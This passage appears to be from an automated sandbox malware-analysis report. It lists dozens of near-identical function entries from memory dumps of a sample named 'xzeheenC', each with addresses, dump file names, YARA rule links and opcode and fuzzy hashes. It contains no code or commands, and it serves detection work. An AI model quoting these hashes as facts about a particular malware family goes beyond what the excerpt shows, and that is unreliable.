                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6ee1886b9a401dea9433e48e3289115d0aa5814952bb7e014c669f76f747879a
                                                                                                                        • Instruction ID: 3442ecb6f2d1452aebbd97250f99a9977ecd7b400436539798ca18431f051c8f
                                                                                                                        • Opcode Fuzzy Hash: 6ee1886b9a401dea9433e48e3289115d0aa5814952bb7e014c669f76f747879a
                                                                                                                        • Instruction Fuzzy Hash: 87F1BBB5E01228CFDB64DFA9C984B9DBBB2BF89300F1081AAD509A7355DB345E85CF50
                                                                                                                        Function 20A8C480 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bec06c1f8c7df34f70473e188652473ead938a49aeb9b2cf5371208f51adda3e
                                                                                                                        • Instruction ID: 9f74832a4e553ed066f59964671acbbacba7763eac56fd428cf97daee4ad0cac
                                                                                                                        • Opcode Fuzzy Hash: bec06c1f8c7df34f70473e188652473ead938a49aeb9b2cf5371208f51adda3e
                                                                                                                        • Instruction Fuzzy Hash: 92F1AB75E01228CFDB64DFA9C984B9DBBB2BF89300F1081AAD509A7351DB346E85CF50
                                                                                                                        Function 20A8ECF8 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b519d43447e418260e4a559931e2b80dfdc3c7129e923a697552ab4cf4892c29
                                                                                                                        • Instruction ID: 7a067ee99b777ee896b5107d8fa46ffb2b06c174cb58aaffb9542a820f8e20a4
                                                                                                                        • Opcode Fuzzy Hash: b519d43447e418260e4a559931e2b80dfdc3c7129e923a697552ab4cf4892c29
                                                                                                                        • Instruction Fuzzy Hash: 96F1AB75E01228CFDB64DFA9C984BDDBBB2BF89300F5081AAD509A7251DB345E85CF50
                                                                                                                        Function 20A8B8F0 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2fcc0440aa3a57121d13f3c4d920472e4a87d738a554f35929c24aa731cc0132
                                                                                                                        • Instruction ID: af174ab4e856a1039b0529efdb581104461375f0915a9ca1a79a18f7a7fb3ff2
                                                                                                                        • Opcode Fuzzy Hash: 2fcc0440aa3a57121d13f3c4d920472e4a87d738a554f35929c24aa731cc0132
                                                                                                                        • Instruction Fuzzy Hash: 54F1ABB5E01228CFDB64DFA9C994BDDBBB2BF89300F1081AAD509A7251DB345E85CF50
                                                                                                                        Function 20A8D010 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 989a350e07bdebf14643ad1f24a05c784c9804d7a46657d073543d96b1e61f97
                                                                                                                        • Instruction ID: 159a0fdcb96b6b76c2d9858780641b6ab323c0b2cc4b7ae27c1b9b0d7afa77f9
                                                                                                                        • Opcode Fuzzy Hash: 989a350e07bdebf14643ad1f24a05c784c9804d7a46657d073543d96b1e61f97
                                                                                                                        • Instruction Fuzzy Hash: 89F1AC75E01228CFDB64DFA9C984B9DBBB2BF89300F5081AAD409A7355DB345E85CF50
                                                                                                                        Function 20A80040 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f886fb457a20ddca935074f3dae9de082f14f49caa51f19d56f1e82f04b63f35
                                                                                                                        • Instruction ID: df0e5ce621475476c9126c713445e77a1f6dcd82d6b3d79a9105f52048d10d43
                                                                                                                        • Opcode Fuzzy Hash: f886fb457a20ddca935074f3dae9de082f14f49caa51f19d56f1e82f04b63f35
                                                                                                                        • Instruction Fuzzy Hash: B3F1AD75E01228CFDB64DFA9C994B9DBBB2BF88300F1081AAD809A7355DB355E85CF50
                                                                                                                        Function 20A8D5D8 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 43389fc81ad092e5397e97b306680d96977f1a2ab0688091f39c30d3efa2c3de
                                                                                                                        • Instruction ID: 999a06729f3488511ffd569b84abe3dfd8be06dfb30394589b34c635954096ca
                                                                                                                        • Opcode Fuzzy Hash: 43389fc81ad092e5397e97b306680d96977f1a2ab0688091f39c30d3efa2c3de
                                                                                                                        • Instruction Fuzzy Hash: B3F19B75E01228CFDB64DFA9C994B9DBBB2BF89300F5081AAD409A7351DB346E85CF50
                                                                                                                        Function 20A8A1D0 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 87d41d4dff82fa682abe059f564a0d37d0c8792184c4dbd7a18f8738a37b7cb1
                                                                                                                        • Instruction ID: 599bd649a4a72aba3f500ddc220ff62bb06631ca027d7c8f9704df18dc2862a5
                                                                                                                        • Opcode Fuzzy Hash: 87d41d4dff82fa682abe059f564a0d37d0c8792184c4dbd7a18f8738a37b7cb1
                                                                                                                        • Instruction Fuzzy Hash: F0F1AC75E01228CFDB64DFA9C994B9DBBB2BF89300F5081AAD409A7351DB345E85CF50
                                                                                                                        Function 20A8E168 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 100eb6cd2000e2179d90e8e1e62ec529516a2c680c0a4bfff81b1f3ef9d53eae
                                                                                                                        • Instruction ID: 0e5e97625778cde7601998a32d561363868028e9c80663e193806e8515de4abd
                                                                                                                        • Opcode Fuzzy Hash: 100eb6cd2000e2179d90e8e1e62ec529516a2c680c0a4bfff81b1f3ef9d53eae
                                                                                                                        • Instruction Fuzzy Hash: B8F1AB75E01228CFDB64DFA9C984B9DBBB2BF89300F5081AAD409A7351DB355E85CF50
                                                                                                                        Function 20A8AD60 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2c95d2dcc49f6addfacfab6e09fe0eb3e38ad078b9faf12032d5542fb764d1e3
                                                                                                                        • Instruction ID: a95ce3fbe875b67f41c580755c08338a70f1de6757d08d891f1fe4dd9039519b
                                                                                                                        • Opcode Fuzzy Hash: 2c95d2dcc49f6addfacfab6e09fe0eb3e38ad078b9faf12032d5542fb764d1e3
                                                                                                                        • Instruction Fuzzy Hash: B3F19B75E01228CFDB64DFA9C994BDDBBB2BF89300F5081AAD409A7251DB346E85CF50
                                                                                                                        Function 20A8BEB8 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5fde1f46cce2517e172a06f11e2e8a791e85ea6880b6eb7328c5956d269bf341
                                                                                                                        • Instruction ID: 4521110e78b1ffd7858de97dc227ba524b03249f6217eec12f5e4abf5dbefdad
                                                                                                                        • Opcode Fuzzy Hash: 5fde1f46cce2517e172a06f11e2e8a791e85ea6880b6eb7328c5956d269bf341
                                                                                                                        • Instruction Fuzzy Hash: 5BF19A75E01228CFDB64DFA9C994B9DBBB2BF89300F5081AAD409A7351DB346E85CF50
                                                                                                                        Function 20A8F2C0 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 837ba2c61a216a23d2270f84ff67b3662d154f3ac848ff592b41ddf81e3c0389
                                                                                                                        • Instruction ID: b306578c868444f3b3626d4ca76c565ff802d366f9c7da8c64d735fc87425d39
                                                                                                                        • Opcode Fuzzy Hash: 837ba2c61a216a23d2270f84ff67b3662d154f3ac848ff592b41ddf81e3c0389
                                                                                                                        • Instruction Fuzzy Hash: C1F1AB75E01228CFDB64DFA9C984B9DBBB2BF89300F5081AAD409A7355DB345E85CF50
                                                                                                                        Function 20A80608 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: accedac27c5fe2f09c9fe4f8a33a6432380e3caf6395fb11e47f7f76f34f3968
                                                                                                                        • Instruction ID: f47a260586729ffbb088d8bf90940004029fba60fe74e063cbf77e751da52d60
                                                                                                                        • Opcode Fuzzy Hash: accedac27c5fe2f09c9fe4f8a33a6432380e3caf6395fb11e47f7f76f34f3968
                                                                                                                        • Instruction Fuzzy Hash: 73F1AD75E01228CFDB64CFA9C994B9DBBB2BF88300F1081AAD819A7355DB355E85CF50
                                                                                                                        Function 20A8CA48 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d41aa230435c9fa156d38367da8da576bfa13c713f24bc7ce18d7eaf19f649c7
                                                                                                                        • Instruction ID: 839245a606012329893226433fe19651e26ed86f1f829c555391ad828805edbb
                                                                                                                        • Opcode Fuzzy Hash: d41aa230435c9fa156d38367da8da576bfa13c713f24bc7ce18d7eaf19f649c7
                                                                                                                        • Instruction Fuzzy Hash: DFF1AB75E01228CFDB64DFA9C984B9DBBB2BF89300F1081AAD509A7351DB346E85CF50
                                                                                                                        Function 20A8DBA0 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c9f438f0c0986755ddcd28a08b6c8bd4724560492a4e892cf4f6728387a7ef86
                                                                                                                        • Instruction ID: ae2c12b78b66ef8138a0649fa1672ac82c401d3de2b8da5b3406c25d0faa1265
                                                                                                                        • Opcode Fuzzy Hash: c9f438f0c0986755ddcd28a08b6c8bd4724560492a4e892cf4f6728387a7ef86
                                                                                                                        • Instruction Fuzzy Hash: 2FF1AC75E01228CFDB64DFA9C984B9DBBB2BF89300F1085AAD409A7351DB346E85CF50
                                                                                                                        Function 20A8A798 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3a2ad6bdc65dbf579917c1d5094ee3e48d0348d043228bcf1a8cf71ec59076de
                                                                                                                        • Instruction ID: d5091cff59b4867976ef667eb0c6012626f8203a93c5b8705910a74f8b1744bd
                                                                                                                        • Opcode Fuzzy Hash: 3a2ad6bdc65dbf579917c1d5094ee3e48d0348d043228bcf1a8cf71ec59076de
                                                                                                                        • Instruction Fuzzy Hash: CDF1ACB5E01228CFDB64DFA9C994B9DBBB2BF89300F5081AAD409A7351DB345E85CF50
                                                                                                                        Function 20A8B328 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 995cb5c7a62abec657b7d1029f05846abe0fe8c49ba4b8e9f6f6d892a7b4eba7
                                                                                                                        • Instruction ID: 0f1f3cb6116089a729d8107fb859db56ebfcd1d8be083edad58c1cc24e03ef3c
                                                                                                                        • Opcode Fuzzy Hash: 995cb5c7a62abec657b7d1029f05846abe0fe8c49ba4b8e9f6f6d892a7b4eba7
                                                                                                                        • Instruction Fuzzy Hash: C5F19A75E01228CFDB64DFA9C994B9DBBB2BF89300F5081AAD409A7251DB346E85CF50
                                                                                                                        Function 20A8E730 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 93bfd935484bc1dec1086276cc23283d0db145afab573aa980dce19304cc36e9
                                                                                                                        • Instruction ID: 5f3c16c249165613241c5a52656098df0b8b6ccf4ec3e788eea72252d5273f52
                                                                                                                        • Opcode Fuzzy Hash: 93bfd935484bc1dec1086276cc23283d0db145afab573aa980dce19304cc36e9
                                                                                                                        • Instruction Fuzzy Hash: F0F1ACB5E01228CFDB64DFA9C984B9DBBB2BF89300F5081AAD409A7351DB345E85CF50
                                                                                                                        Function 20AA82A0 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9df0c0520befe33b6e5ed2f74a0922aa53d9f5c91bf78533ca11f4c40b89c737
                                                                                                                        • Instruction ID: 1c74cad19a88388ae9ed1a1cf4169fd5aeda7af8197842e8189ea1c32592c4d8
                                                                                                                        • Opcode Fuzzy Hash: 9df0c0520befe33b6e5ed2f74a0922aa53d9f5c91bf78533ca11f4c40b89c737
                                                                                                                        • Instruction Fuzzy Hash: 6FF1AB75E01228CFDB64DFA9C984B9DBBB2BF89300F5081AAD409A7391DB345E85CF50
                                                                                                                        Function 20AABCA0 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5d0c465e4c9b8774ecf711184757bc22b62b630d30b69e8da8383a73b91f09ab
                                                                                                                        • Instruction ID: 424f119190fdac06acdd71101706d0e6aa8ee6ff8bf73ed3e226828b37978f56
                                                                                                                        • Opcode Fuzzy Hash: 5d0c465e4c9b8774ecf711184757bc22b62b630d30b69e8da8383a73b91f09ab
                                                                                                                        • Instruction Fuzzy Hash: 21F1AB75E01228CFDB64DFA9C994B9DBBB2BF89300F5081AAD409A7391DB345E85CF50
                                                                                                                        Function 20AA9FB8 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7bdafb1d3b8cba8ac8268fabee6c9d993dd75d729d34cf3a139116167357236f
                                                                                                                        • Instruction ID: 203a172ea0ef9c23582382721d967cb5401cbfce598b8ae3b74c02355f66704b
                                                                                                                        • Opcode Fuzzy Hash: 7bdafb1d3b8cba8ac8268fabee6c9d993dd75d729d34cf3a139116167357236f
                                                                                                                        • Instruction Fuzzy Hash: B1F1AC75E01228CFDB64DFA9C984B9DBBB2BF89300F5081AAD409A7391DB345E85CF50
                                                                                                                        Function 20AAA580 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1bb7074185e3a4079602cfb28f36db18a8dd2af8b498a819cf67017a94421ece
                                                                                                                        • Instruction ID: 1c277531fb549f04a2f50b436c23d3a14fa69f93e178f67733bf29e09259da56
                                                                                                                        • Opcode Fuzzy Hash: 1bb7074185e3a4079602cfb28f36db18a8dd2af8b498a819cf67017a94421ece
                                                                                                                        • Instruction Fuzzy Hash: CAF1AB75E01228CFDB64DFA9C984B9DBBB2BF88300F5081AAD409A7391DB345E85CF50
                                                                                                                        Function 20AA1198 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e0065fbd8b8803bb1d02b8c47decc2859fd3efb79ed9eec0194b4d62a2a9705d
                                                                                                                        • Instruction ID: a7fd4947cfc6652cff8a22a914347e2f08d441b061369fc84f4f89f4faa4c290
                                                                                                                        • Opcode Fuzzy Hash: e0065fbd8b8803bb1d02b8c47decc2859fd3efb79ed9eec0194b4d62a2a9705d
                                                                                                                        • Instruction Fuzzy Hash: E7F1AD75E01228CFDB64DFA9C994B9DBBB2BF89300F5081AAD409A7391DB345E85CF50
                                                                                                                        Function 20AA93F8 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9de22d3f8ec9d516dbc4bbf7e2501789de579709d61945c7b87f5bd02c061d3b
                                                                                                                        • Instruction ID: 8bef3e2bdc629b686d45f7f63c7f1918c4e85557c7c4106a2e3e7e6bb1a96e34
                                                                                                                        • Opcode Fuzzy Hash: 9de22d3f8ec9d516dbc4bbf7e2501789de579709d61945c7b87f5bd02c061d3b
                                                                                                                        • Instruction Fuzzy Hash: 8BF1AB75E01228CFDB64DFA9C984B9DBBB2BF89300F5081AAD409A7391DB345E85CF50
                                                                                                                        Function 20AA7CD8 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fc1476c3623a06691b0488159c70a154aa3ec72d31b0288bfbfd4e45542c6c93
                                                                                                                        • Instruction ID: 96b006164fab2b6896710b26e393d2fb9e20f35508b04edaf9f70fbe262e6e7e
                                                                                                                        • Opcode Fuzzy Hash: fc1476c3623a06691b0488159c70a154aa3ec72d31b0288bfbfd4e45542c6c93
                                                                                                                        • Instruction Fuzzy Hash: 83F19B75E01228CFDB64DFA9C994BDDBBB2BF89300F5081AAD409A7291DB345E85CF50
                                                                                                                        Function 20AAB6D8 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 682b758d8c948545866f6e7abcf80b2d17f0ee2730f6cde2755ef07ea8922af8
                                                                                                                        • Instruction ID: 26b33347cdd407d6cd905468247806a955b1c513026598063508ce051d9f7777
                                                                                                                        • Opcode Fuzzy Hash: 682b758d8c948545866f6e7abcf80b2d17f0ee2730f6cde2755ef07ea8922af8
                                                                                                                        • Instruction Fuzzy Hash: 6BF1AC75E01228CFDB64DFA9C994B9DBBB2BF89300F5081AAD409A7391DB345E85CF50
                                                                                                                        Function 20AA0BD0 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1de1c55c2539a6eff30ead505a77f71b67898e8e8eb6894d41ff6a578a8395df
                                                                                                                        • Instruction ID: d90b33336d522b33d075a3b0ce800713d21d78e96d513b62d323bea10c6c743f
                                                                                                                        • Opcode Fuzzy Hash: 1de1c55c2539a6eff30ead505a77f71b67898e8e8eb6894d41ff6a578a8395df
                                                                                                                        • Instruction Fuzzy Hash: 01F1AD75E01228CFDB64DFA9C984B9DBBB2BF88300F1085AAD509A7391DB345E85CF50
                                                                                                                        Function 20AA7120 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 262ac3617354efd8d337ddf6f54c060c399394cf332f526c511cbed3ea917140
                                                                                                                        • Instruction ID: 4cc1df45ab60e64006eaad6118857a82370e310100ee016f7d7295bc232870bf
                                                                                                                        • Opcode Fuzzy Hash: 262ac3617354efd8d337ddf6f54c060c399394cf332f526c511cbed3ea917140
                                                                                                                        • Instruction Fuzzy Hash: AEF19C75E01228CFDB64DFA9C994B9DBBB2BF89300F5081AAD409A7391DB345E85CF50
                                                                                                                        Function 20AA8E30 Relevance: .3, Instructions: 319COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
